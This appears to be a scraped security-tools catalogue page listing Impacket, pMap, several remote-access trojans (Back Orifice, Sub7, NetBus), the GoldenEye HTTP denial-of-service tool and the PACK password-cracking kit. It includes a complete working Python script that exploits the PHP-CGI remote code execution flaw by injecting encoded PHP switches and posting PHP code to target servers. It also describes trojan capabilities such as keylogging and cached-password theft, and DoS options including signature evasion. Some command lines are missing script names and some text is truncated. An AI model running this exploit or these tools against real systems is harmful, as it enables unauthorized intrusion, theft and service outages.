Microsoft Windows


Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (for instance NMB, SMB1-3 and MS-DCERPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

Featured Protocols:
Ethernet, Linux "Cooked" capture.
IP, TCP, UDP, ICMP, IGMP, ARP. (IPv4 and IPv6)
NMB and SMB1/2/3 (high-level implementations).
DCE/RPC versions 4 and 5, over different transports: UDP (version 4 exclusively), TCP, SMB/TCP, SMB/NetBIOS and HTTP.
Portions of the following DCE/RPC interfaces: Conv, DCOM (WMI, OAUTH), EPM, SAMR, SCMR, RRP, SRVSC, LSAD, LSAT, WKST, NRPC.

Extra Information:
The examples folder contains many pre-built tools that can be used for tasks such as pass the hash, dumping domain hashes, and golden tickets.


pyCryptocat - A Cryptocat standalone python client

Authors and contributors
Simone Margaritelli (evilsocket)
Raffaele Forte

Cryptocat is free software that aims to provide an open, accessible Instant Messaging environment that encrypts your conversations and works right in your browser.
pyCryptocat is a Cryptocat standalone chat client written in Python, using the python-webkit package to serve Cryptocat JS and HTML files.
Cryptocat provides multi-user (and private) instant messaging inside chatrooms. It uses the OTR protocol for encrypted two-party chat and the (upcoming) mpOTR protocol for encrypted multi-party chat.
The goal is to provide the easiest, most accessible way to chat while maintaining your privacy online.


pMap is a tool for passively discovering, scanning, and fingerprinting hosts on the local network. Included is a precompiled Windows binary.

Authored by Gregory Pickett
Updated: Feb 4, 2014

Changes: Additional Multicast DNS and SSDP fingerprints. Excludes connected printers from fingerprinting process. Displays any available service configuration.

Reveals open TCP and UDP ports
Uses UDP, mDNS, and SSDP to identify PCs, NAS, Printers, Phones, Tablets, CCTV, DVR, and Others
Device Type, Make, and Model
Operating Systems and Version
Service Versions and Configuration
Stand-Alone (Nmap-like output) or Agent Mode (SYSLOG)
Metasploit Script Included

PHP-CGI Remote Code Execution Scanner

PHP-CGI Remote Code Execution Scanner - This small Python script scans for a number of variations on the PHP-CGI remote code execution vulnerability, including "apache magica" and Plesk paths, along with other misconfigurations.

Authored by infodox

# Written for /r/netsec
# test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths.
# infodox - 2013
# Twitter: @info_dox
# Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
# released under WTFPL
import requests
import sys

def scan(target):
    # Locations where a PHP-CGI binary may be directly reachable.
    paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5']
    for path in paths:
        probe(target, path)

def probe(target, path):
    print("[*] Testing Path: %s" % path)
    # URL-encoded PHP command-line switches carried in the query string.
    trigger = path + "/?"
    trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
    trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
    trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
    trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
    trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
    trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
    trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
    trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
    trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
    trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
    trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
    trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
    trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
    url = target + trigger
    # Marker payload: the response is checked for the digest it prints.
    php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>"""
    try:
        haxor = requests.post(url, php)
        if "44e902a5aa760d79b76e070fa6725386" in haxor.text:
            print("Exploitable!")
    except Exception:
        print("Err, Someshit broke")

def main(args):
    if len(sys.argv) != 2:
        print("Usage: %s <target>" % sys.argv[0])
        sys.exit(1)
    scan(sys.argv[1])

if __name__ == "__main__":
    main(sys.argv)

Simple IPv4 and IPv6 banner grabbing scripts, typically used for telnet/Cisco appliances, although they may work on services.

Back Orifice (BO)

Back Orifice debuted at DEF CON 6 on August 1, 1998. It was the brainchild of Sir Dystic, a member of the U.S. hacker organization Cult of the Dead Cow. According to the group, its purpose was to demonstrate the lack of security in Microsoft's operating system Windows 98.

The last version was bo2k (back orifice 2k) which previously had the source code open & available for download. Currently we have been unable to locate a copy of that source.

The Back Orifice Server Contains the Following Functionality
System control
Create dialog boxes with the text of your choice. Log keystrokes. Lockup or reboot the machine.

Get detailed system information, including:
current user
cpu type
windows version
memory usage
mounted disks (including hard drives, cdroms, removable drives and remote network drives) and information for those drives
screensaver password
passwords cached by the user (including those for dialups, web and network access, and any other password cached by the operating system)

File system control
Copy, rename, delete, view, and search files and directories. File compression and decompression.
Process control
List, kill, and spawn processes.
Registry control
List, create, delete and set keys and values in the registry.
Network control
View all accessible network resources, all incoming and outgoing connections, list, create and delete network connections, list all exported resources and their passwords, create and delete exports.
Multimedia control
Play wav files, capture screen shots, and capture video or still frames from any video input device (like a Quickcam).
Packet redirection
Redirect any incoming TCP or UDP port to any other address & port.
Application redirection
Spawn most console applications (such as on any TCP port, allowing control of applications via a telnet session.
HTTP server
Upload and download files on any port using a www client such as Netscape.

Sub7, Subseven

Sub7, or SubSeven or Sub7Server, is a remote administration tool/trojan program (RAT—where the "T" can have a dual meaning in this case).[1] Its name was derived by spelling NetBus backwards ("suBteN") and swapping "ten" with "seven".
Because its typical use is to allow undetected and unauthorized access, Sub7 is usually described as a trojan horse by security experts.
Sub7 worked on the Windows 9x and on the Windows NT family of operating systems, up to and including Windows XP.

It was originally designed by someone with the handle 'mobman'. No development had occurred for several years until a new version was scheduled for release on Feb. 28th, 2010. The Sub7 project was dormant for over 6 years until. In October 2009 mobman was alleged to have stated via IRC that, due to working and going to college full-time, he would not be able to help with Sub7.

In 2006 a website with hundreds of thousands of users kept Sub7 alive with clean downloads, support and new software. A new version was created by defcon but not released; only a handful of people knew about it and used it well.

SubSeven 2.3, released on March 9, 2010, was revamped to work on all 32-bit and 64-bit versions of Windows and includes TCP Tunnel and Password Recovery for browsers, instant messengers and email clients.

Sub7 has more features than NetBus (webcam capture, multiple port redirect, user-friendly registry editor, chat and more), but it always tries to install itself into the Windows directory and it does not have activity logging.
According to a security analysis,[8] Sub7's server-side (target computer) features include:
sound files from a microphone attached to the machine
images from an attached video camera
screen shots of the computer
retrieving a listing of recorded and cached passwords


NetBus was written in Delphi by Carl-Fredrik Neikter, a Swedish programmer in March 1998. It was in wide circulation before Back Orifice was released, in August 1998. The author claimed that the program was meant to be used for pranks, not for illegally breaking into computer systems. Translated from Swedish, the name means "NetPrank".

When started for the first time, the server would install itself on the host computer, including modifying the Windows registry so that it starts automatically on each system startup. The server is a faceless process listening for connections on port 12345 (in some versions, the port number can be adjusted). Port 12346 is used for some tasks, as well as port 20034.

The client was a separate program presenting a graphical user interface that allowed the user to perform a number of activities on the remote computer. Examples of its capabilities:
Keystroke logging
Keystroke injection
Screen captures
Program launching
File browsing
Shutting down the system
Opening / closing CD-tray
Tunneling protocol (NetBus connections through a number of systems.)

The NetBus client was designed to support the following operating system versions:
Windows 95
Windows 98
Windows ME
Windows NT 4.0
Netbus client (v1.70) works fine in Windows 2000 and in Windows XP as well


GoldenEye is a Python app for SECURITY TESTING PURPOSES ONLY!
GoldenEye is an HTTP DoS Test Tool.
Attack Vector exploited: HTTP Keep Alive + NoCache

GoldenEye is an HTTP/S Layer 7 denial of service testing tool. It uses KeepAlive (and Connection: keep-alive) paired with Cache-Control options to persist socket connection busting through caching (when possible) until it consumes all available sockets on the HTTP/S server.

Changes: Referer strings from search engines now only domain part hardcoded. Referer generation function now generates even more random referers. Evades Juniper Netscreen signature. Various other updates and improvements.

Flag            Description                                      Default
-t, --threads   Number of concurrent threads                     500
-m, --method    HTTP Method to use 'get' or 'post' or 'random'   get
-d, --debug     Enable Debug Mode [more verbose output]          False
-h, --help      Shows this help


Flag              Description                                      Default
-u, --useragents  File with user-agents to use                     randomly generated
-w, --workers     Number of concurrent workers                     50
-s, --sockets     Number of concurrent sockets                     30
-m, --method      HTTP Method to use 'get' or 'post' or 'random'   get
-d, --debug       Enable Debug Mode [more verbose output]          False
-h, --help        Shows this help

util/ - Fetches user-agent lists from subpages (ex: ./ REQUIRES BEAUTIFULSOUP4

PACK - Password Analysis & Cracking Kit

PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in the analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for the Hashcat family of password crackers.

NOTE: The toolkit itself is not able to crack passwords, but is instead designed to make operation of password crackers more efficient.

The most basic analysis that you can perform is simply obtaining the most common length, character-set and other characteristics of passwords in the provided list. In the example below, we will use 'rockyou.txt' containing approximately 14 million passwords. Launch with the following command line:
$ python rockyou.txt

Using filters
Let's see how RockYou users tend to select their passwords using the "stringdigit" simple mask (a string followed by numbers):
$ python ../PACK-0.0.3/archive/rockyou.txt --simplemask stringdigit -q --hiderare

Saving advanced masks
While the "Advanced Mask" section only displays patterns matching greater than 1% of all passwords, you can obtain and save a full list of password masks matching a given dictionary by using the following command:
$ python rockyou.txt -o rockyou.masks

MaskGen allows you to craft pattern-based mask attacks for input into the Hashcat family of password crackers. The tool uses output produced by statsgen above with the '-o' flag in order to produce the most optimal mask attack sorted by mask complexity, mask occurrence or the ratio of the two (optimal index).
Let's run MaskGen with only StatGen's output as an argument:
$ python rockyou.masks

Specifying target time
